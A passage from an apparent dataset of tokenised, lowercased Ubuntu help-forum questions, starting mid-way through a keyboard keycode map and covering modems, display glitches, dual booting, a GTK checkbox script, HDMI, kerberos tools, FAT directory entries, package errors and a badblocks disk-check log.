ordfeminine dstroke keycode 42 = g g g g eng eng eng keycode 43 = h h h h hstroke hstroke hstroke keycode 44 = j j j j dead_hook dead_horn dead_hook keycode 45 = k k k k kra ampersand kra keycode 46 = l l l l lstroke lstroke lstroke keycode 47 = m m m m dead_acute dead_doubleacute dead_acute keycode 48 = ugrave percent ugrave percent dead_acute dead_caron dead_acute keycode 49 = twosuperior threesuperior twosuperior threesuperior notsign notsign notsign keycode 50 = shift_l nosymbol shift_l keycode 51 = mu sterling mu sterling dead_grave dead_breve dead_grave keycode 52 = w w w w guillemotleft less guillemotleft keycode 53 = x x x x guillemotright greater guillemotright keycode 54 = c c c c cent copyright cent keycode 55 = v v v v leftdoublequotemark leftsinglequotemark leftdoublequotemark keycode 56 = b b b b rightdoublequotemark rightsinglequotemark rightdoublequotemark keycode 57 = n n n n n n n keycode 58 = comma question comma question dead_cedilla masculine dead_cedilla keycode 59 = semicolon period semicolon period horizconnector multiply horizconnector keycode 60 = colon slash colon slash periodcentered division periodcentered keycode 61 = equal plus equal plus dead_tilde dead_abovedot dead_tilde keycode 62 = shift_r nosymbol shift_r keycode 63 = kp_multiply kp_multiply kp_multiply kp_multiply kp_multiply kp_multiply xf86cleargrab keycode 64 = alt_l meta_l alt_l meta_l keycode 65 = space nosymbol space keycode 66 = multi_key nosymbol multi_key keycode 67 = f1 f1 f1 f1 f1 f1 xf86switch_vt_1 keycode 68 = f2 f2 f2 f2 f2 f2 xf86switch_vt_2 keycode 69 = f3 f3 f3 f3 f3 f3 xf86switch_vt_3 keycode 70 = f4 f4 f4 f4 f4 f4 xf86switch_vt_4 keycode 71 = f5 f5 f5 f5 f5 f5 xf86switch_vt_5 keycode 72 = f6 f6 f6 f6 f6 f6 xf86switch_vt_6 keycode 73 = f7 f7 f7 f7 f7 f7 xf86switch_vt_7 keycode 74 = f8 f8 f8 f8 f8 f8 xf86switch_vt_8 keycode 75 = f9 f9 f9 f9 f9 f9 xf86switch_vt_9 keycode 76 = f10 f10 f10 f10 f10 f10 xf86switch_vt_10 keycode 77 = num_lock nosymbol num_lock keycode 78 = scroll_lock nosymbol scroll_lock keycode 79 = kp_home kp_7 kp_home kp_7 keycode 80 = kp_up kp_8 kp_up kp_8 keycode 81 = kp_prior kp_9 kp_prior kp_9 keycode 82 = kp_subtract kp_subtract kp_subtract kp_subtract kp_subtract kp_subtract xf86prev_vmode keycode 83 = kp_left kp_4 kp_left kp_4 keycode 84 = kp_begin kp_5 kp_begin kp_5 keycode 85 = kp_right kp_6 kp_right kp_6 keycode 86 = kp_add kp_add kp_add kp_add kp_add kp_add xf86next_vmode keycode 87 = kp_end kp_1 kp_end kp_1 keycode 88 = kp_down kp_2 kp_down kp_2 keycode 89 = kp_next kp_3 kp_next kp_3 keycode 90 = kp_insert kp_0 kp_insert kp_0 keycode 91 = kp_delete kp_decimal kp_delete kp_decimal keycode 92 = iso_level3_shift nosymbol iso_level3_shift keycode 93 = keycode 94 = less greater less greater backslash backslash backslash keycode 95 = f11 f11 f11 f11 f11 f11 xf86switch_vt_11 keycode 96 = f12 f12 f12 f12 f12 f12 xf86switch_vt_12 keycode 97 = keycode 98 = katakana nosymbol katakana keycode 99 = hiragana nosymbol hiragana keycode 100 = henkan_mode nosymbol henkan_mode keycode 101 = hiragana_katakana nosymbol hiragana_katakana keycode 102 = muhenkan nosymbol muhenkan keycode 103 = keycode 104 = kp_enter nosymbol kp_enter keycode 105 = control_r nosymbol control_r keycode 106 = kp_divide kp_divide kp_divide kp_divide kp_divide kp_divide xf86ungrab keycode 107 = print sys_req print sys_req keycode 108 = iso_level3_shift nosymbol iso_level3_shift keycode 109 = linefeed nosymbol linefeed keycode 110 = home nosymbol home keycode 111 = up nosymbol up keycode 112 = prior nosymbol prior keycode 113 = left nosymbol left keycode 114 = right nosymbol right keycode 115 = end nosymbol end keycode 116 = down nosymbol down keycode 117 = next nosymbol next keycode 118 = insert nosymbol insert keycode 119 = delete nosymbol delete keycode 120 = keycode 121 = xf86audiomute nosymbol xf86audiomute keycode 122 = xf86audiolowervolume nosymbol xf86audiolowervolume keycode 123 = xf86audioraisevolume nosymbol xf86audioraisevolume keycode 124 = xf86poweroff nosymbol xf86poweroff keycode 125 = kp_equal nosymbol kp_equal keycode 126 = plusminus nosymbol plusminus keycode 127 = pause break pause break keycode 128 = xf86launcha nosymbol xf86launcha keycode 129 = kp_decimal kp_decimal kp_decimal kp_decimal keycode 130 = hangul nosymbol hangul keycode 131 = hangul_hanja nosymbol hangul_hanja keycode 132 = keycode 133 = super_l nosymbol super_l keycode 134 = super_r nosymbol super_r keycode 135 = u0394 nosymbol u0394 keycode 136 = cancel nosymbol cancel keycode 137 = redo nosymbol redo keycode 138 = sunprops nosymbol sunprops keycode 139 = undo nosymbol undo keycode 140 = sunfront nosymbol sunfront keycode 141 = xf86copy nosymbol xf86copy keycode 142 = xf86open nosymbol xf86open keycode 143 = xf86paste nosymbol xf86paste keycode 144 = find nosymbol find keycode 145 = xf86cut nosymbol xf86cut keycode 146 = help nosymbol help keycode 147 = xf86menukb nosymbol xf86menukb keycode 148 = xf86calculator nosymbol xf86calculator keycode 149 = keycode 150 = xf86sleep nosymbol xf86sleep keycode 151 = xf86wakeup nosymbol xf86wakeup keycode 152 = xf86explorer nosymbol xf86explorer keycode 153 = xf86send nosymbol xf86send keycode 154 = keycode 155 = xf86xfer nosymbol xf86xfer keycode 156 = xf86launch1 nosymbol xf86launch1 keycode 157 = xf86launch2 nosymbol xf86launch2 keycode 158 = xf86www nosymbol xf86www keycode 159 = xf86dos nosymbol xf86dos keycode 160 = xf86screensaver nosymbol xf86screensaver keycode 161 = keycode 162 = xf86rotatewindows nosymbol xf86rotatewindows keycode 163 = xf86mail nosymbol xf86mail keycode 164 = xf86favorites nosymbol xf86favorites keycode 165 = xf86mycomputer nosymbol xf86mycomputer keycode 166 = xf86back nosymbol xf86back keycode 167 = xf86forward nosymbol xf86forward keycode 168 = keycode 169 = xf86eject nosymbol xf86eject keycode 170 = xf86eject xf86eject xf86eject xf86eject keycode 171 = xf86audionext nosymbol xf86audionext keycode 172 = xf86audioplay xf86audiopause xf86audioplay xf86audiopause keycode 173 = xf86audioprev nosymbol xf86audioprev keycode 174 = xf86audiostop xf86eject xf86audiostop xf86eject keycode 175 = xf86audiorecord nosymbol xf86audiorecord keycode 176 = xf86audiorewind nosymbol xf86audiorewind keycode 177 = xf86phone nosymbol xf86phone keycode 178 = keycode 179 = xf86tools nosymbol xf86tools keycode 180 = xf86homepage nosymbol xf86homepage keycode 181 = xf86reload nosymbol xf86reload keycode 182 = xf86close nosymbol xf86close keycode 183 = keycode 184 = keycode 185 = xf86scrollup nosymbol xf86scrollup keycode 186 = xf86scrolldown nosymbol xf86scrolldown keycode 187 = parenleft nosymbol parenleft keycode 188 = parenright nosymbol parenright keycode 189 = xf86new nosymbol xf86new keycode 190 = redo nosymbol redo keycode 191 = xf86tools nosymbol xf86tools keycode 192 = xf86launch5 nosymbol xf86launch5 keycode 193 = xf86launch6 nosymbol xf86launch6 keycode 194 = xf86launch7 nosymbol xf86launch7 keycode 195 = xf86launch8 nosymbol xf86launch8 keycode 196 = xf86launch9 nosymbol xf86launch9 keycode 197 = keycode 198 = xf86audiomicmute nosymbol xf86audiomicmute keycode 199 = xf86touchpadtoggle nosymbol xf86touchpadtoggle keycode 200 = xf86touchpadon nosymbol xf86touchpadon keycode 201 = xf86touchpadoff nosymbol xf86touchpadoff keycode 202 = keycode 203 = mode_switch nosymbol mode_switch keycode 204 = nosymbol alt_l nosymbol alt_l keycode 205 = nosymbol meta_l nosymbol meta_l keycode 206 = nosymbol super_l nosymbol super_l keycode 207 = nosymbol hyper_l nosymbol hyper_l keycode 208 = xf86audioplay nosymbol xf86audioplay keycode 209 = xf86audiopause nosymbol xf86audiopause keycode 210 = xf86launch3 nosymbol xf86launch3 keycode 211 = xf86launch4 nosymbol xf86launch4 keycode 212 = xf86launchb nosymbol xf86launchb keycode 213 = xf86suspend nosymbol xf86suspend keycode 214 = xf86close nosymbol xf86close keycode 215 = xf86audioplay nosymbol xf86audioplay keycode 216 = xf86audioforward nosymbol xf86audioforward keycode 217 = keycode 218 = print nosymbol print keycode 219 = keycode 220 = xf86webcam nosymbol xf86webcam keycode 221 = keycode 222 = keycode 223 = xf86mail nosymbol xf86mail keycode 224 = xf86messenger nosymbol xf86messenger keycode 225 = xf86search nosymbol xf86search keycode 226 = xf86go nosymbol xf86go keycode 227 = xf86finance nosymbol xf86finance keycode 228 = xf86game nosymbol xf86game keycode 229 = xf86shop nosymbol xf86shop keycode 230 = keycode 231 = cancel nosymbol cancel keycode 232 = xf86monbrightnessdown nosymbol xf86monbrightnessdown keycode 233 = xf86monbrightnessup nosymbol xf86monbrightnessup keycode 234 = xf86audiomedia nosymbol xf86audiomedia keycode 235 = xf86display nosymbol xf86display keycode 236 = xf86kbdlightonoff nosymbol xf86kbdlightonoff keycode 237 = xf86kbdbrightnessdown nosymbol xf86kbdbrightnessdown keycode 238 = xf86kbdbrightnessup nosymbol xf86kbdbrightnessup keycode 239 = xf86send nosymbol xf86send keycode 240 = xf86reply nosymbol xf86reply keycode 241 = xf86mailforward nosymbol xf86mailforward keycode 242 = xf86save nosymbol xf86save keycode 243 = xf86documents nosymbol xf86documents keycode 244 = xf86battery nosymbol xf86battery keycode 245 = xf86bluetooth nosymbol xf86bluetooth keycode 246 = xf86wlan nosymbol xf86wlan keycode 247 = keycode 248 = keycode 249 = keycode 250 = keycode 251 = keycode 252 = keycode 253 = keycode 254 = keycode 255 = second one : clear lock keysym caps_lock = multi_key what am i doing wrong ? i 'm using belgian dutch-language azerty by the way , for might that be needed to solve it . and i am using xubuntu , so i ca n't change compose key/caps lock behaviours in the control center .
484728	how to make my ubuntu 14.04 recognise mmx377g usb manager for enabling net facility via modem	output from wine my vendor id etc details note : using wine is also of no use since it is giving error . can you suggest any solution for this which may be worked out from windows in where the network is working well ?
484729	bizarre gui repeat behavior	so , when i restarted my 14.04 vmware workstation 9 image the other day , i am confronted with repeating narrow bands with the launcher showing multiple times . it 's not a display resolution issue . everything i do on the left is mirrored on the right . any ideas of what could cause this and how to rectify ? i do n't reboot often , so i have absolutely no idea what update could have caused this .
484730	my minecraft has a very low fps rate and freezes every second on 12.04 lts	i recently installed minecraft on my ubuntu 12.04 lts computer with all the correct java packages and lwjgl , but when i go to play it , the fps rate drops to ~3 fps and freezes every second , making play almost impossible . my hardware specs . are : memory : 3.6 gib processor : amd athlon ( tm ) ii x2 245 processor ă 2 graphics : geforce 7025 / nforce 630a/integrated/sse2 os type : 64-bit disk : 242.2 gb java : java version `` 1.6.0_31 '' openjdk runtime environment ( icedtea6 1.13.3 ) ( 6b31-1.13.3-1ubuntu1~0.12.04.2 ) openjdk 64-bit server vm ( build 23.25-b01 , mixed mode ) minecraft version : 1.7.2 ok , i hope that helps ... please reply . edit : my processor frequency is 2900 mhz .
484733	install ubuntu alongside windows 7 is not working	i am attempting to install ubuntu 14.04 lts with a usb drive on my laptop which has windows 7 installed ( as well as hp quickweb if that makes a differences ) . i want to keep windows 7 . so , i followed the instructions , booted to my flash drive , and began the installation process . the first thing that i noticed was that the screen shown was not the same as that of the tutorial page . the following screen was not shown instead , i get this screen : based on the descriptions , i choose to `` install inside windows '' after this , my computer turned off , and began to restart . upon restarting , windows 7 started . i was not asked for the size of the partition , nor anything else . any ideas as to why this is happening ?
484735	all dimentions for vncserver geometry	i would like to figure out all the screen sizes supported by xterm geometry . is there a command by which i can list all supported sizes . currently in my xstartup script i provide the line xterm -geometry 1024x768 -ls -title `` $ vncdesktop desktop '' & can i increase this size ?
484740	python gtk : how to stop a function from happening if a checkbox is checked	in my program i have one of those annoying popups that alerts the user to go check the settings . i have a checkbox that if checked , is supposed to never show the popup again . i have no idea how to do that . when the check box is checked i need the program to write to a text file called tog_file.txt saying `` true '' . and if the text in tog_file.txt says true , the popup will never display again . code : def reminder ( ) : global tog tog = open ( `` tog_file.txt '' , `` r+b '' ) tog_r = tog.read ( ) if tog_r == `` true '' : print `` true '' if tog_r == `` '' : global reminder reminder = gtk.window ( gtk.window_toplevel ) reminder.set_position ( gtk.win_pos_center ) reminder.set_size_request ( 450 , 205 ) reminder.set_title ( `` info '' ) textbox = gtk.label ( `` remember to go into the settings menu ! there are important settings that need to be reviewed by you ! '' ) textbox.set_justify ( gtk.justify_center ) textbox.set_line_wrap ( true ) button = gtk.button ( `` close '' ) button.connect ( `` clicked '' , reminder_close ) toggle = gtk.checkbutton ( `` do n't show this message again '' ) item_text = toggle.get_active ( ) if item_text == false : print `` no '' if item_text == true : print `` yea '' tog.write ( `` true '' ) fixed = gtk.fixed ( ) fixed.put ( button , 300 , 160 ) fixed.put ( toggle , 50 , 165 ) fixed.put ( textbox , 50 , 50 ) reminder.add ( fixed ) reminder.show_all ( ) def reminder_close ( self ) : reminder.destroy ( ) if you need any additional information , just post a comment . thanks stackoverflow : )
484741	hdmi port has stopped working on 12.04 lts	i have been using 12.04 lts with an hdmi monitor for quite some time now and everything has been working wonderfully . however , recently my hdmi port has stopped working , and i have been all over these and other forums without finding a solution . i know that the the hdmi cable and the monitor are n't the problem because i have swapped out both these pieces of hardware with no change . i am using an hp envy laptop . the cpu is an intel ( r ) core ( tm ) i5-4200u cpu @ 1.60ghz . i am using that cpus graphics chip - intel速 hd graphics 4400 . i do not have a dedicated graphics card . : $ xrandr screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 edp1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1366x768 60.0*+ 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 the above information proves that the system is not aware of the hdmi port hardware , and only the laptops display . it feels to me as if the hdmi port drivers are no longer working . might anyone know how to help me fix this ? do i need to reinstall drivers , or install a different kernel ? is there some other issue possibly ? thanks in advance for any help . john
484743	where is krb5_util on ubuntu 14.04 ?	the crucial krb5_util command ( http : //web.mit.edu/kerberos/krb5-latest/doc/admin/admin_commands/kdb5_util.html # kdb5-util-8 ) does n't seem to be available on ubuntu 14.04 although it ships with 1.12.x and it is availabel in the installation from sources ( 1.12.1-final ) . apt-file update & & apt-file find krb5_util does n't give me anything . krb5_newrealm ( which does n't seem to exist in sources installation ) does n't have any arguments according to the manpage and ignores it 's -- help argument . could it be that ubuntu does a really strange packaging for kerberos which should be documented much better ( or at least mentioned ( in manpages , usage hints , etc. ) ) ? i installed krb5-config , krb5-doc , krb5-user , krb5-kdc and krb5-admin-server in synaptic . background is that i want to setup an openafs with kerberos .
484745	dual boot 3 ubuntu based systems and a bootloader using virtual hard disks	i know this sounds crazy , but i want to : install plop linux on my current lubuntu 14.04 system create a new 450 gb ext4 partition on my external drive and put my home folder there create another ext4 partition ( 50 gb ) and put a 45 gb virtual hard drive for ubuntu 14.04 and zorin os 8 , followed by a 5gb virtual hard drive for plop linux . dual boot my lubuntu install with zorin os and vanilla ( unity ) ubuntu and have my home folder auto-mount when booting into any of the os 's . that 's alot to do , but the result should make the perfect desktop out of an old junkyard computer that i have upgraded over the years . so , in the process : how do i get grub to give me two seconds to select any of the os 's on the virtual hard disks or my main hard disk before booting into lubuntu ? and if zorin os does n't ask if you want to upgrade like ubuntu does , how can i upgrade it ?
484746	the `` size '' field in directory entry meaning for directories ?	i 'm looking at low-level directory structure of a disk partition , formatted as `` vfat '' filesystem . the directory entry structure i use is : struct __attribute__ ( ( packed ) ) dentry { char name [ 11 ] ; attr attr ; uint8_t reserved ; uint8_t ctimetenth ; time ctime ; date cdate ; date adate ; uint16_t clusterhi ; time mtime ; date mdate ; uint16_t clusterlo ; uint32_t size ; } ; so , the last four bytes of the directory entry should represent size of file or directory in bytes . however , in my experiments directory entries for directories ( not files ) always have zero in the size field . for example , this is dd dump of my root directory with one file and one non-empty subdirectory ( named qqq ) : 00000000 42 65 00 65 00 66 00 66 00 66 00 0f 00 fe 00 00 |be.e.f.f.f ... ... | 00000010 ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff | ... ... ... ... ... .| 00000020 01 61 00 61 00 61 00 62 00 62 00 0f 00 fe 62 00 |.a.a.a.b.b ... .b.| 00000030 63 00 63 00 63 00 64 00 64 00 00 00 64 00 65 00 |c.c.c.d.d ... d.e.| 00000040 41 41 41 42 42 42 7e 31 20 20 20 20 00 64 43 60 |aaabbb~1 .dc`| 00000050 d1 44 d1 44 00 00 43 60 d1 44 04 00 0b 00 00 00 |.d.d..c`.d ... ... | 00000060 41 71 00 71 00 71 00 00 00 ff ff 0f 00 3d ff ff |aq.q.q ... ... .=..| 00000070 ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff | ... ... ... ... ... .| 00000080 51 51 51 20 20 20 20 20 20 20 20 10 00 00 20 79 |qqq ... y| 00000090 d1 44 d1 44 00 00 20 79 d1 44 09 00 00 00 00 00 |.d.d.. y.d ... ... | 000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| ( bytes with size are 0x9c - 0x9f ) could you please explain me why this size is zero ? or may be , somebody could point me to a doc , describing vfat directory entries with more details ? ( i 'm on ubuntu 3.11.10.3 , running as a guest os in vmware fusion on mac )
484747	how to remove matlab on ubuntu 14.04	i ca n't uninstall matlab from my ubuntu 14.04. when i use sudo apt-get purge maltab command then it shows the matlab configuration page but when i cancel the installation process then it shows reading package lists ... done building dependency tree reading state information ... done package 'matlab ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 148 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up matlab-support ( 0.0.19 ) ... no default matlab path found . exiting . dpkg : error processing package matlab-support ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : matlab-support e : sub-process /usr/bin/dpkg returned an error code ( 1 ) please help me how to remove it .
484750	why build-essential failed ?	i can not found solution for this problem : constantia @ constantia : ~ $ sudo apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : build-essential : depends : dpkg-dev ( > = 1.13.5 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . constantia @ constantia : ~ $ sudo apt-get install dpkg-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : dpkg-dev : depends : libdpkg-perl ( = 1.17.5ubuntu5 ) but 1.17.5ubuntu5.2 is to be installed recommends : build-essential but it is not going to be installed recommends : fakeroot but it is not going to be installed recommends : libalgorithm-merge-perl but it is not going to be installed e : unable to correct problems , you have held broken packages . constantia @ constantia : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . sorry , if my questions is so stupid . maybe somebody explain me from where my problem is ? i do n't touch the system at all ( new installation of 14.04 ) . thank you .
484755	thumbnails while searching folders on xubuntu ?	how can i see the thumbnails of my picture while browsing folders ? when i triy to upload a picture i can only see their names . i 'm using xubuntu 14.04 right now .
484756	permission propagation when dumping text into file	if i do : sudo mysqldump -- default-character-set=utf8 -u root -pwelcome1 mydb > dump.sql i get : -bash : dump.sql : permission non accordăše however if i sudo to su first , it works fine . it seems that sudo does not propagate to the > command . how can i fix this ?
484757	badblocks repairing disk ?	sorry about the name , i have no idea how to describe this in a short phrase . so i had windows crash and it would n't boot from the disk , it is a 500gb hitachi 5200rpm drive on an acer aspire 7560 . i booted from my linux hard drive , used the `` disks '' or whatever program , and it said that i had 1000 or so `` bad blocks '' i checked an hour later and it said it had `` 3800 '' bad blocks , i am running badblocks on it right now with the non-destructive read/write test and it shows only read errors , no write or compare errors . does this mean that there are only data corruption errors on the disk from an abrupt shutdown , or is the disk surface genuinely damaged ? the number of bad blocks has not increased since i checked two hours ago , in fact it seems to have decreased from what i recall . edit : i got some compare errors , actually , here is a log of what it has given me so far : sawyer @ sawyer-vostro-1720 : /home-ext/home/sawyer $ sudo badblocks -v -n -s /dev/sdb [ sudo ] password for sawyer : checking for bad blocks in non-destructive read-write mode from block 0 to 488386583 checking for bad blocks ( non-destructive read-write test ) testing with random pattern : 0.00 % done , 0:37 elapsed . ( 0/0/0 errors ) 217784 % done , 19:14 elapsed . ( 0/0/0 errors ) 217785 % done , 19:20 elapsed . ( 1/0/0 errors ) 217786 % done , 19:27 elapsed . ( 2/0/0 errors ) 217787 % done , 19:33 elapsed . ( 3/0/0 errors ) 217792 % done , 19:49 elapsed . ( 4/0/0 errors ) 217793 % done , 19:56 elapsed . ( 5/0/0 errors ) 217794 % done , 20:02 elapsed . ( 6/0/0 errors ) 217795 % done , 20:09 elapsed . ( 7/0/0 errors ) 217800 % done , 20:15 elapsed . ( 8/0/0 errors ) 217801 % done , 20:22 elapsed . ( 9/0/0 errors ) 217802 % done , 20:28 elapsed . ( 10/0/0 errors ) 217803 % done , 20:38 elapsed . ( 11/0/0 errors ) 217816 % done , 20:44 elapsed . ( 12/0/0 errors ) 217817 % done , 20:51 elapsed . ( 13/0/0 errors ) 217818 % done , 21:00 elapsed . ( 14/0/0 errors ) 217819 % done , 21:07 elapsed . ( 15/0/0 errors ) 217828 % done , 21:14 elapsed . ( 16/0/0 errors ) 217829 % done , 21:23 elapsed . ( 17/0/0 errors ) 217830 % done , 21:30 elapsed . ( 18/0/0 errors ) 217831 % done , 21:36 elapsed . ( 19/0/0 errors ) 217832 % done , 21:43 elapsed . ( 20/0/0 errors ) 217833 % done , 21:49 elapsed . ( 21/0/0 errors ) 217834 % done , 21:56 elapsed . ( 22/0/0 errors ) 217835 % done , 22:02 elapsed . ( 23/0/0 errors ) 217836 % done , 22:09 elapsed . ( 24/0/0 errors ) 217837 % done , 22:15 elapsed . ( 25/0/0 errors ) 217838 % done , 22:22 elapsed . ( 26/0/0 errors ) 217839 % done , 22:29 elapsed . ( 27/0/0 errors ) 217840 % done , 22:35 elapsed . ( 28/0/0 errors ) 217841 % done , 22:42 elapsed . ( 29/0/0 errors ) 217842 % done , 22:48 elapsed . ( 30/0/0 errors ) 217843 % done , 22:55 elapsed . ( 31/0/0 errors ) 217844 % done , 23:01 elapsed . ( 32/0/0 errors ) 217845 % done , 23:08 elapsed . ( 33/0/0 errors ) 217846 % done , 23:14 elapsed . ( 34/0/0 errors ) 217847 % done , 23:21 elapsed . ( 35/0/0 errors ) 217848 % done , 23:30 elapsed . ( 36/0/0 errors ) 217856 % done , 24:02 elapsed . ( 37/0/0 errors ) 217857 % done , 24:09 elapsed . ( 38/0/0 errors ) 217864 % done , 24:20 elapsed . ( 39/0/0 errors ) 217865 % done , 24:27 elapsed . ( 40/0/0 errors ) 217866 % done , 24:33 elapsed . ( 41/0/0 errors ) 217867 % done , 24:40 elapsed . ( 42/0/0 errors ) 217868 % done , 24:46 elapsed . ( 43/0/0 errors ) 217869 % done , 24:52 elapsed . ( 44/0/0 errors ) 217870 % done , 24:59 elapsed . ( 45/0/0 errors ) 217871 % done , 25:05 elapsed . ( 46/0/0 errors ) 217876 % done , 25:18 elapsed . ( 47/0/0 errors ) 217877 % done , 25:24 elapsed . ( 48/0/0 errors ) 217878 % done , 25:31 elapsed . ( 49/0/0 errors ) 217879 % done , 25:37 elapsed . ( 50/0/0 errors ) 217908 % done , 25:57 elapsed . ( 51/0/0 errors ) 217909 % done , 26:06 elapsed . ( 52/0/0 errors ) 217912 % done , 26:19 elapsed . ( 53/0/0 errors ) 217916 % done , 26:29 elapsed . ( 54/0/0 errors ) 217917 % done , 26:32 elapsed . ( 55/0/0 errors ) 217918 % done , 26:45 elapsed . ( 56/0/0 errors ) 217919 % done , 26:51 elapsed . ( 57/0/0 errors ) 218040 % done , 27:57 elapsed . ( 58/0/0 errors ) 218041 % done , 28:01 elapsed . ( 59/0/0 errors ) 218049 % done , 28:42 elapsed . ( 60/0/0 errors ) 218052 % done , 28:55 elapsed . ( 61/0/0 errors ) 218053 % done , 28:59 elapsed . ( 62/0/0 errors ) 218054 % done , 29:12 elapsed . ( 63/0/0 errors ) 218055 % done , 29:21 elapsed . ( 64/0/0 errors ) 218056 % done , 29:25 elapsed . ( 65/0/0 errors ) 218057 % done , 29:31 elapsed . ( 66/0/0 errors ) 218080 % done , 30:22 elapsed . ( 67/0/0 errors ) 218084 % done , 30:39 elapsed . ( 68/0/0 errors ) 218085 % done , 30:52 elapsed . ( 69/0/0 errors ) 218086 % done , 30:56 elapsed . ( 70/0/0 errors ) 218113 % done , 31:19 elapsed . ( 71/0/0 errors ) 218148 % done , 31:29 elapsed . ( 72/0/0 errors ) 218149 % done , 31:37 elapsed . ( 73/0/0 errors ) 218150 % done , 31:47 elapsed . ( 74/0/0 errors ) 218151 218152 218153 % done , 32:06 elapsed . ( 75/0/2 errors ) 218155 % done , 32:16 elapsed . ( 76/0/2 errors ) 218156 218157 % done , 32:36 elapsed . ( 77/0/3 errors ) 218160 % done , 32:52 elapsed . ( 78/0/3 errors ) 218164 218165 % done , 33:15 elapsed . ( 79/0/4 errors ) 218166 % done , 33:27 elapsed . ( 80/0/4 errors ) 218167 % done , 33:40 elapsed . ( 81/0/4 errors ) 218168 % done , 33:53 elapsed . ( 82/0/4 errors ) 218169 % done , 34:00 elapsed . ( 83/0/4 errors ) 218170 % done , 34:10 elapsed . ( 84/0/4 errors ) 218171 % done , 34:16 elapsed . ( 85/0/4 errors ) 218172 % done , 34:23 elapsed . ( 86/0/4 errors ) 218173 % done , 34:39 elapsed . ( 87/0/4 errors ) 218174 % done , 34:45 elapsed . ( 88/0/4 errors ) 218175 % done , 34:52 elapsed . ( 89/0/4 errors ) 218244 % done , 35:06 elapsed . ( 90/0/4 errors ) 218245 % done , 35:09 elapsed . ( 91/0/4 errors ) 218246 % done , 35:16 elapsed . ( 92/0/4 errors ) 218247 % done , 35:22 elapsed . ( 93/0/4 errors ) 218248 % done , 35:25 elapsed . ( 94/0/4 errors ) 218249 % done , 35:29 elapsed . ( 95/0/4 errors ) 218250 % done , 35:32 elapsed . ( 96/0/4 errors ) 218251 % done , 35:35 elapsed . ( 97/0/4 errors ) 218252 % done , 35:42 elapsed . ( 98/0/4 errors ) 218253 % done , 35:48 elapsed . ( 99/0/4 errors ) 218254 % done , 35:54 elapsed . ( 100/0/4 errors ) 218255 % done , 36:01 elapsed . ( 101/0/4 errors ) 218256 % done , 36:07 elapsed . ( 102/0/4 errors ) 218257 % done , 36:14 elapsed . ( 103/0/4 errors ) 218258 % done , 36:20 elapsed . ( 104/0/4 errors ) 218259 % done , 36:27 elapsed . ( 105/0/4 errors ) 218260 % done , 36:33 elapsed . ( 106/0/4 errors ) 218261 % done , 36:40 elapsed . ( 107/0/4 errors ) 218262 % done , 36:46 elapsed . ( 108/0/4 errors ) 218263 % done , 36:53 elapsed . ( 109/0/4 errors ) 218264 % done , 36:59 elapsed . ( 110/0/4 errors ) 218265 % done , 37:06 elapsed . ( 111/0/4 errors ) 218266 % done , 37:09 elapsed . ( 112/0/4 errors ) 218267 % done , 37:15 elapsed . ( 113/0/4 errors ) 218268 % done , 37:22 elapsed . ( 114/0/4 errors ) 218269 % done , 37:28 elapsed . ( 115/0/4 errors ) 218270 % done , 37:35 elapsed . ( 116/0/4 errors ) 218271 % done , 37:41 elapsed . ( 117/0/4 errors ) 218272 % done , 37:48 elapsed . ( 118/0/4 errors ) 218273 % done , 37:57 elapsed . ( 119/0/4 errors ) 218274 % done , 38:01 elapsed . ( 120/0/4 errors ) 218275 % done , 38:07 elapsed . ( 121/0/4 errors ) 218276 % done , 38:14 elapsed . ( 122/0/4 errors ) 218277 % done , 38:20 elapsed . ( 123/0/4 errors ) 218278 % done , 38:26 elapsed . ( 124/0/4 errors ) 218279 % done , 38:33 elapsed . ( 125/0/4 errors ) 218280 % done , 38:39 elapsed . ( 126/0/4 errors ) 218281 % done , 38:46 elapsed . ( 127/0/4 errors ) 218282 % done , 38:56 elapsed . ( 128/0/4 errors ) 218283 % done , 39:03 elapsed . ( 129/0/4 errors ) 218284 % done , 39:09 elapsed . ( 130/0/4 errors ) 218285 % done , 39:16 elapsed . ( 131/0/4 errors ) 218286 % done , 39:22 elapsed . ( 132/0/4 errors ) 218287 % done , 39:28 elapsed . ( 133/0/4 errors ) 218288 % done , 39:35 elapsed . ( 134/0/4 errors ) 218289 % done , 39:41 elapsed . ( 135/0/4 errors ) 218290 % done , 39:48 elapsed . ( 136/0/4 errors ) 218291 % done , 39:58 elapsed . ( 137/0/4 errors ) 218292 % done , 40:04 elapsed . ( 138/0/4 errors ) 218293 % done , 40:11 elapsed . ( 139/0/4 errors ) 218294 % done , 40:14 elapsed . ( 140/0/4 errors ) 218295 % done , 40:20 elapsed . ( 141/0/4 errors ) 218296 % done , 40:27 elapsed . ( 142/0/4 errors ) 218297 % done , 40:33 elapsed . ( 143/0/4 errors ) 218298 % done , 40:40 elapsed . ( 144/0/4 errors ) 218299 % done , 40:43 elapsed . ( 145/0/4 errors ) 218300 % done , 40:49 elapsed . ( 146/0/4 errors ) 218301 % done , 40:59 elapsed . ( 147/0/4 errors ) 218302 % done , 41:05 elapsed . ( 148/0/4 errors ) 218303 % done , 41:12 elapsed . ( 149/0/4 errors ) 218304 % done , 41:15 elapsed . ( 150/0/4 errors ) 218434 % done , 43:37 elapsed . ( 151/0/4 errors ) 218436 % done , 43:47 elapsed . ( 152/0/4 errors ) 218437 % done , 44:00 elapsed . ( 153/0/4 errors ) 218438 % done , 44:13 elapsed . ( 154/0/4 errors ) 218439 % done , 44:26 elapsed . ( 155/0/4 errors ) i know it is 